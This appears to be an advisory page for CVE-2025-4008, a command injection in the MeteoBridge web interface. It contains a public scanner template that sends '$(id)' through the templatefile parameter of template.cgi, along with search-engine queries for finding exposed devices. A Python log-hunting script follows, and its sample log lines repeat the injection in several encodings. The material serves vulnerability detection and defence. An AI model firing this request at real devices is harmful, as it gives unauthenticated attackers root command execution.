The Meteobridge web interface lets Meteobridge administrators manage their weather station data collection and administer their Meteobridge system through a web application written in CGI shell scripts and C. This web interface exposes an endpoint that is vulnerable to command injection. Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges (root) on affected devices.
PoC code [public]
id: CVE-2025-4008

info:
  name: MeteoBridge <= 6.1 - Remote Code Execution
  author: iamnoooob,pdresearch
  severity: high
  description: |
    The Meteobridge web interface let meteobridge administrator manage their weather station data collection and administer their meteobridge system through a web application written in CGI shell scripts and C.This web interface exposes an endpoint that is vulnerable to command injection.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.
  reference:
    - https://forum.meteohub.de/viewtopic.php?t=18687
    - https://www.onekey.com/resource/security-advisory-remote-command-execution-on-smartbedded-meteobridge-cve-2025-4008
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4008
  classification:
    cve-id: CVE-2025-4008
    cvss-score: 7.5
    cwe-id: CWE-77
    epss-score: 0.47353
    epss-percentile: 0.97551
  metadata:
    verified: true
    shodan-query: "meteobridge"
    fofa-query: "Meteobridge"
  tags: cve,cve2025,meteobridge,rce,kev,vkev,vuln

http:
  - raw:
      - |
        GET /public/template.cgi?templatefile=$(id) HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Error: template file'
          - 'uid='
          - 'gid='
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a9bf81730ab4ba8fceb90c9699542067b5eeca52f422a32234ba8185304324c30220691ad21d5a82f219fa34c6b533022431eec971160642c02b7d79f2efe89047eb:922c64590222798bb761d5b6d8e72950
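
For defenders, the request shape in the template above can be hunted for in web access logs. The following is an added example, not part of the original template or the vendor's code: it assumes a combined-format access log, and the function names, regexes and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Shell metacharacters that a template file name never needs.
SHELL_META = re.compile(r'[$`;|&<>(){}\n\r\\]')
ENDPOINT = "/public/template.cgi"  # path and parameter as in the template above
PARAM = "templatefile"

def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded values are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (ip, status, decoded_value) for each request to the endpoint whose
    templatefile value contains shell metacharacters after decoding."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable access log entry
        parts = urlsplit(m.group("target"))
        if fully_unquote(parts.path) != ENDPOINT:
            continue
        for raw in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            value = fully_unquote(raw)
            if SHELL_META.search(value):
                hits.append((m.group("ip"), int(m.group("status")), value))
    return hits

# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /public/template.cgi?templatefile=current.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2025:10:00:05 +0000] "GET /public/template.cgi?templatefile=$(id) HTTP/1.1" 200 87',
    '198.51.100.7 - - [01/Jan/2025:10:00:09 +0000] "GET /public/template.cgi?templatefile=%24%28id%29 HTTP/1.1" 200 87',
    '198.51.100.9 - - [01/Jan/2025:10:00:12 +0000] "GET /public/template.cgi?templatefile=%2524%2528id%2529 HTTP/1.1" 200 87',
    '203.0.113.4 - - [01/Jan/2025:10:01:00 +0000] "GET /index.html?templatefile=$(id) HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} status={status} templatefile={value!r}")
```

A hit only shows that a request of this shape reached the server; whether the command ran has to be confirmed from the response body or host-side evidence, which access logs do not record.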